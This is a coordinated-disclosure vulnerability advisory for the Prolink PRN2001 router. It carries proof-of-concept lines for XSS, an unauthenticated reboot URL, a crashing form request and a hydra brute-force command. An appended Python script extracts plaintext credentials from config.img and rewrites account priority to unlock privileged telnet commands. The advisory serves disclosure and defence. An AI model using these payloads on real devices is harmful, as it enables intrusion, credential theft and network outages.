Exploit Title: Prolink PRN2001 Multiple Vulnerabilities

1. -Advisory Information-

Title: Prolink PRN2001 Multiple Vulnerabilities
Firmware: Ver 1.2
Firmware URL: http://www.prolink2u.com/download/fw/fw_PRN2001_V1.2_20130323.zip
Vendor Homepage: http://www.prolink2u.com/
Author: Herman Groeneveld aka sh4d0wman
Tested On: Windows 7 / Kali
Date published: Dec 01 2014
Release mode: Coordinated release

2. -Vulnerability Information-

PROLiNK® PRN2001 Wireless-N Broadband AP / Router is the ideal wireless solution most suited for home and small-businesses. Designed to support wireless speeds of up to 150Mbps, the PRN2001 offers stellar performance on the 2.4GHz frequency band. This top-notch home networking device functions as an Access Point, Router or a Universal Repeater.

Multiple vulnerabilities have been discovered in this router. The majority require a valid account on the device to exploit. Default credentials are admin/password.

In the default configuration all vulnerabilities can only be exploited from the LAN/WLAN interfaces. A successful compromise gives an attacker full control over the device, which includes enabling remote device management over the WAN interface.

3. -Technical Description / Proof of Concept Code-

Introduction: the following types of vulnerabilities have been discovered in the device:
- 3.1: CWE-286: Incorrect User Management
- 3.2: CWE-668: Exposure of Resource to Wrong Sphere
- 3.3: CWE-200: Information Exposure
- 3.4: CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
- 3.5: CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service
- 3.6: CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration

Technical Description:
--------------------------------------------------------------
3.1 -Class: CWE-286: Incorrect User Management-

Description: insufficient separation of privileges.
Any account with user-level privileges has the following privileges in the web-management interface:
- Create new users with administrative privileges
- Upgrade the device firmware
- Download and upload configuration files

PoC: a user-level account can escalate its privileges by creating a new administrative account.

--------------------------------------------------------------
3.2 -CWE-668: Exposure of Resource to Wrong Sphere-

Description: a user-level account is not restricted from exporting or importing the device configuration file. The configuration file "config.img" is stored as plaintext XML. This is the root cause of the following vulnerabilities:

---------------------------------------------------------------
Name: privilege escalation through device configuration file
Description: the plaintext XML configuration file leaks the administrative username and password of the device, giving an attacker full control over the device.
PoC: administrative accounts have FLAG value 0x0:

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="PRIORITY" V="0x2"/>
</chain>

---------------------------------------------------------------
Name: telnet privilege escalation through device configuration file
Description: in the plaintext XML configuration file every administrative user account is set to <V N="PRIORITY" V="0x2"/>. When this value is changed to <V N="PRIORITY" V="0x1"/> in the exported file and the file is imported again, the account gains the following additional command options in a telnet shell:
- chksum: Check sum checking. Syntax: chksum address length
- dhcp: Enable DHCP client
- disable: Turn off privileged commands
- enable: Turn on privileged commands
- loaddll: Unknown functionality / DoS: issuing loaddll crashes the device
- script: Run specified script
- system: Show general system information
- webdll: Unknown functionality
- xfile: File copy functionality
- xip: Resolve DNS

--------------------------------------------------------------
3.3 -CWE-200: Information Exposure-

Description: the device leaks various kinds of sensitive information which can aid an attacker in vulnerability discovery and/or privilege escalation.

Vulnerable Functions:
--------------------------------------------------------------
Name: configuration-file sensitive information disclosure
Description: the XML configuration file "config.img" can be exported by user-level accounts and is stored as plaintext. The following sensitive information is leaked:

Confidentiality related:
- Plaintext administrative credentials
- Plaintext user-level credentials
- Plaintext PPPoE WAN credentials
- Plaintext WEP key | WPA PSK | WSC PIN

Device integrity related (by modifying the exported file and importing it again):
- Create, modify or delete accounts. PoC: change anything inside the chain or delete the complete chain:

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="PRIORITY" V="0x2"/>
</chain>

- Enable device management over WAN. PoC: modify NATRULE_INSRC_STATIC to allow web and/or telnet device management over the WAN port.
- DNS traffic redirection. PoC: modify the DHCP-assigned DNS settings to point clients to a rogue DNS server.

--------------------------------------------------------------
Name: log-file sensitive information disclosure
Description: logging is disabled by default. When it is enabled, any valid user-level or administrative account can view the log through the web-management interface. Invalid logon attempts show the username and the invalid password in plaintext.
If a user misspells his password, an attacker has a high chance of guessing the correct password.
Data exposed:
- Usernames
- Passwords (partial)

--------------------------------------------------------------
Name: telnet sensitive information disclosure
Description: the telnet command "show web" lists the complete web structure, which can aid an attacker in vulnerability discovery.
PoC: the following URLs are leaked and are not reachable through the default web-management interface:
- dhcpvendortbl_withoutcheck.htm
- debug.htm

--------------------------------------------------------------
3.4 -CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)-

Description: the web-based device management interface is vulnerable to persistent XSS caused by insufficient input validation. A valid account on the router is needed to exploit these vulnerabilities.

Vulnerable Functions:
--------------------------------------------------------------
URL: ddns.htm
Field(s): hostname, username
PoC: insert into both fields: <script>alert(String.fromCharCode(88,83,83));</script>
XSS execution:
- when the dyndns settings page is requested in the web-interface
- if logging is enabled: when the system log is loaded in the web-interface

--------------------------------------------------------------
URL: login.htm
Field(s): username
PoC: insert as username: <script>alert(String.fromCharCode(88,83,83));</script>
XSS execution:
- if logging is enabled: when the system log is loaded in the web-interface

--------------------------------------------------------------
URL: config.img
Field(s): any of the above values, modified through the configuration file (XML).
Description: the configuration file is stored in plaintext. The injections above can be carried out by inserting the XSS test string into the XML elements and importing the file. Execution takes place inside the web-management interface when the vulnerable URLs are browsed to.
XSS execution:
- same locations as the injections disclosed above, but via XML. Username injection example:

<V N="USERNAME" V="[XSS Inject Here]"/>
<V N="PASSWORD" V="test"/>

--------------------------------------------------------------
3.5 -CWE-730: OWASP Top Ten 2004 Category A9 - Denial of Service-

Description: unauthenticated and authenticated users can perform various actions which result in the router crashing and rebooting. In the process all LAN, WAN and wireless connections are dropped.

Vulnerable Functions:
--------------------------------------------------------------
Name: Unauthenticated device DoS
Description: requesting [device ip]/autoboot.htm from the web-management interface, without authentication, makes the device reboot. In the process all LAN, WAN and wireless connections are dropped. Device settings are not reset: they remain unchanged after the reboot.
PoC: GET request to [device ip]/autoboot.htm

--------------------------------------------------------------
Name: Authenticated device DoS through invalid firmware update
Description: authenticated users can crash the device by uploading a large file as a firmware upgrade. The device performs no checks before the upload is accepted. After a certain amount of data has been uploaded the device reboots, most likely due to exhaustion of memory or local storage.
PoC: upload any large file as firmware image

--------------------------------------------------------------
Name: Authenticated Telnet custom command device DoS
Description: various custom telnet commands can be unlocked through the configuration file (see 3.2). Executing the "loaddll" command without any parameters crashes and reboots the device.
PoC: gain the special privileges described in 3.2 and issue loaddll inside the telnet shell

--------------------------------------------------------------
Name: Authenticated NTP Date HTTP Request device DoS
Description: the web-management interface allows authenticated users to configure the time.
If certain parameters are modified the device crashes and reboots.
PoC: POST form2systime.cgi?year=1975&month=Jan&day=1&hour=0&min=19&sec=24&daylightsaving=6&submit.htm%3Ftime.htm=send
Insert junk (for example 400 'A' characters) in year, month or day and the device crashes.

--------------------------------------------------------------
3.6 -CWE-933: OWASP Top Ten 2013 Category A5 - Security Misconfiguration-

Description: various configuration settings do not conform to generally recommended security best practices, weakening the device's security posture.

Vulnerable Functions:
--------------------------------------------------------------
Name: configuration error
Description: when new user accounts are created through the web-management interface, the default permission level is root and it cannot be changed to user-level in the interface. Intercepting the HTTP request and modifying the privilege parameter to user-level does, however, create an account with user-level privileges, for which parts of the web-management interface are restricted.
PoC: enter a valid name and password, then set the privilege level to 1 (root privileges) or 2 (user privileges):
username=[name]&privilege=[2]&newpass=[pass]&confpass=[pass]&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

--------------------------------------------------------------
Name: unencrypted device management protocols
Description: the router can be managed either through the web-management interface (HTTP) or through Telnet. Both protocols use plaintext communication, which allows an attacker on the network path to intercept and/or modify this traffic.

--------------------------------------------------------------
Name: password complexity and lockout policy
Description: no password complexity is enforced; the minimum length is 1 character. No lockout mechanism exists for the web-management interface. This enables an attacker to find a valid username / password combination through password guessing or brute-forcing.
Weak passwords give an attacker a higher chance of success. The telnet service does feature a lockout policy: it disconnects any client after three wrong login attempts.
PoC: hydra [ip] -l admin -P /root/Desktop/pass.txt -f -v -t 1 http-post-form '/login.cgi:username=^USER^&password=^PASS^&submit.htm%3Flogin.htm=Send:F=Username or password error'

--------------------------------------------------------------
4. -Vendor Information, Solutions and Workarounds-

Date 10-10-2014 - Vulnerabilities discovered
Date 20-10-2014 - Contacted vendor by e-mail for responsible disclosure, informed them of release date December 1st 2014. No reply
Date 01-11-2014 - Contacted vendor by e-mail. No reply
Date 15-11-2014 - Contacted vendor by e-mail. No reply
Date 01-12-2014 - Public disclosure

5. -Author-

This vulnerability was discovered and researched by: Herman Groeneveld aka sh4d0wman
I am a freelance security consultant / researcher based in Phnom Penh.
Looking for career opportunities, fellow researchers, help in unpacking the encrypted firmware :-)
herman_worldwide [at] hotmail [.co]m
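The config.img handling described in sections 3.2 and 3.3, as an added example that is not code from the advisory or from the vendor. It parses the plaintext XML export, lists every USERNAME_PASSWORD chain (FLAG 0x0 marks administrative accounts, per section 3.2) and rewrites the PRIORITY value of one account, which is the telnet escalation step from section 3.2; the rewritten file would then be imported back through the configuration upload that user-level accounts can reach. The XML sample is constructed for this example: the admin chain is the one shown in the advisory, while the "guest" account, its FLAG 0x1 and PRIORITY 0x3 values, and the <root> element name are assumptions. How the device itself parses a re-imported file is not verified here.

```python
# Added example, not code from the advisory or from Prolink: parse and
# rewrite the plaintext config.img XML described in sections 3.2 / 3.3.
import xml.etree.ElementTree as ET

# Constructed sample. The admin chain is the fragment shown in the advisory;
# the "guest" chain, its FLAG/PRIORITY values and <root> are assumptions.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<root>
  <chain N="USERNAME_PASSWORD">
    <V N="FLAG" V="0x0"/>
    <V N="USERNAME" V="admin"/>
    <V N="PASSWORD" V="password"/>
    <V N="PRIORITY" V="0x2"/>
  </chain>
  <chain N="USERNAME_PASSWORD">
    <V N="FLAG" V="0x1"/>
    <V N="USERNAME" V="guest"/>
    <V N="PASSWORD" V="guest1"/>
    <V N="PRIORITY" V="0x3"/>
  </chain>
</root>
"""

ADMIN_FLAG = 0x0            # advisory 3.2: administrative accounts have FLAG 0x0
TELNET_PRIV_PRIORITY = 0x1  # advisory 3.2: PRIORITY 0x1 unlocks extra telnet commands


def _account_chains(root):
    """Yield every <chain N="USERNAME_PASSWORD"> element in the document."""
    for chain in root.iter("chain"):
        if chain.get("N") == "USERNAME_PASSWORD":
            yield chain


def parse_accounts(xml_text):
    """Return one dict per account chain; FLAG and PRIORITY decoded from hex."""
    root = ET.fromstring(xml_text)
    accounts = []
    for chain in _account_chains(root):
        vals = {v.get("N"): v.get("V") for v in chain.findall("V")}
        accounts.append({
            "username": vals.get("USERNAME", ""),
            "password": vals.get("PASSWORD", ""),   # stored in plaintext (3.3)
            "flag": int(vals.get("FLAG", "0x0"), 16),
            "priority": int(vals.get("PRIORITY", "0x0"), 16),
        })
    return accounts


def admin_accounts(xml_text):
    """Usernames of the accounts the advisory identifies as administrative."""
    return [a["username"] for a in parse_accounts(xml_text) if a["flag"] == ADMIN_FLAG]


def set_priority(xml_text, username, priority):
    """Rewrite PRIORITY for one account and return the serialised XML.

    Raises KeyError if no chain carries that USERNAME, so a typo does not
    silently produce an unchanged file.
    """
    root = ET.fromstring(xml_text)
    changed = False
    for chain in _account_chains(root):
        vals = {v.get("N"): v for v in chain.findall("V")}
        user = vals.get("USERNAME")
        if user is None or user.get("V") != username:
            continue
        prio = vals.get("PRIORITY")
        if prio is None:                      # chain without PRIORITY: add one
            prio = ET.SubElement(chain, "V", N="PRIORITY")
        prio.set("V", "0x%x" % priority)
        changed = True
    if not changed:
        raise KeyError("no account named %r in config" % username)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for acct in parse_accounts(SAMPLE_CONFIG):
        print("%-8s %-10s flag=0x%x priority=0x%x" % (
            acct["username"], acct["password"], acct["flag"], acct["priority"]))
    print("admins:", admin_accounts(SAMPLE_CONFIG))
    print(set_priority(SAMPLE_CONFIG, "admin", TELNET_PRIV_PRIORITY))
```

Running it as a script prints the recovered credentials and the rewritten XML with the admin chain at PRIORITY 0x1. ElementTree re-serialises attribute values with XML escaping, so a value containing characters such as < or & is written as an entity; whether the device decodes entities on import is not covered by the advisory.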